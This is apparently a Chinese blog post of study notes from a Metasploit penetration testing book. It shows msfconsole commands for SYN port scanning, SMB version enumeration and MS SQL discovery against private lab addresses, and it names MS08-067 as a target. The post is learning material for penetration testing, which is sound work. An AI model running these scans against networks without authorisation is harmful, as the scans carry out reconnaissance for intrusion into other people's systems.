    2.2.3 Metasploit进行端口扫描

    metasploit不仅可以用第三方扫描器,还内建了一些扫描端口工具,搭配框架使用相得益彰。接下来会展示跳板攻击(内建工具和已攻陷主机,获取内网的访问通道并进行攻击)

    SYN端口扫描器对单主机进行简单扫描

    #搜索端口扫描模块
    search portscan
    
    #使用syn扫描
    use auxiliary/scanner/portscan/syn
    
    #设置目标ip
    set rhosts 192.168.48.133
    
    #设置线程数
    set threads 50
    
    #启动攻击
    run
    

    这个扫描有点慢,这里可以看到目前135端口是开放的。
    在这里插入图片描述

    2.3针对性扫描

    如果有捷径肯定是要走的,没什么要羞愧的,所以针对性扫描是很有必要的,假如市场告诉你大部分机子都存在一个漏洞,你肯定优先扫描,比如MS08-067(著名的远程溢出漏洞,影响范文是Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta)

    2.3.1 服务器消息块协议扫描

    SMB协议是微软和英特尔1987年制定的通信协议,大多运行在Windows系统上。Metasploit可以利用它的smb_version模块来遍历一个网络,并获取Windows系统的版本号。

    #搜索端口扫描模块
    search smb_version
    
    #使用smb_version
    use auxiliary/scanner/smb/smb_version
    
    #设置目标ip
    set rhosts 192.168.48.133
    
    #启动
    run
    

    这里可以看到我靶机的版本xp sp3、中文、用户名等信息。
    在这里插入图片描述

    2.3.2 搜寻配置不当的Microsoft SQL Server(MS SQL)

    这个数据库软件,很多系统因为装了Microsoft Visual Studio而被安装,因为SQL Server是先决条件。SQL Server一般不被使用和配置所以被忽视了,但是其存在安全隐患。
    MS SQL安装后,默认监听在TCP端口1443或者使用随机的动态TCP端口。如果是随机的动态端口,只要简单的对1434(MS SQL开放的)这个udp端口进行查询,就能知道随机的tcp端口号,metasploit有一个mssql_ping模块可以帮我们完成。

    #使用mssql_ping
    use auxiliary/scanner/mssql/mssql_ping
    
    #设置目标网段
    set rhosts 192.168.48.0/24
    
    
    #设置线程数(255提高扫描速度)
    set threads 255
    
    #启动
    run
    

    这里我没有安装,直接用书中的截图了。
    在这里插入图片描述

    3.子标题

    正文

    在这里插入代码片
    

    4.子标题

    正文

    在这里插入代码片
    

    番外

    #更新软件列表
    apt-get update
    
    #更新软件
    apt-get upgrade 
    
    #更新内核
    apt-get dist-upgrade
    
    展开全文
  • Metasploit 渗透测试指南
  • Metasploit渗透测试手册,完整扫描版

    热门讨论 2014-05-10 15:45:42
    】《metasploit渗透测试指南》介绍metasploit——近年来最强大、最流行和最有发展前途的开源渗透测试平台软件,以及基于metasploit进行网络渗透测试与安全漏洞研究分析的技术、流程和方法。 《metasploit渗透测试...
  • 从之前的学习明白了一件事情就是,渗透攻击的本质是识别并充分利用目标系统中存在的安全漏洞。 本章学习meterpreter,通常作为攻击载荷使用,来提升后渗透攻击阶段的能力。 使用meterpreter的前提,触发漏洞并选择...
  • Metasploit渗透测试

    2018-08-10 13:24:59
    Metasploit 渗透测试在安全漏洞挖掘的同时,黑客们回开发概念验证性的渗透攻击代码(POC),用于验证找到的安全漏洞是否确实存在,并确认其是否可被利用
  • 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器...
  • metasploit渗透测试指南学习

    千次阅读 2018-10-22 15:31:29
    启动:msfconsole 启动的方法非常简单只需要在终端输入 msfconsole ...在这里,我们可以看到Domain servers不属于weimain.xyz所有,所以,我们不能对这些域名服务器进行攻击。...3.2.2在metasploit使用数据库  
  • 诸葛建伟大大的书,说真的哈,作为一个纯小白,感觉写的不是很细致,这边算是做一些批注第五章,第一次渗透测试。最后跑出来总是报错,在大佬的指导下试了下永恒之蓝跑win7,一遍成功。msf命令下,search 17_010use ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 877
精华内容 350
关键字:

metasploit渗透测试指南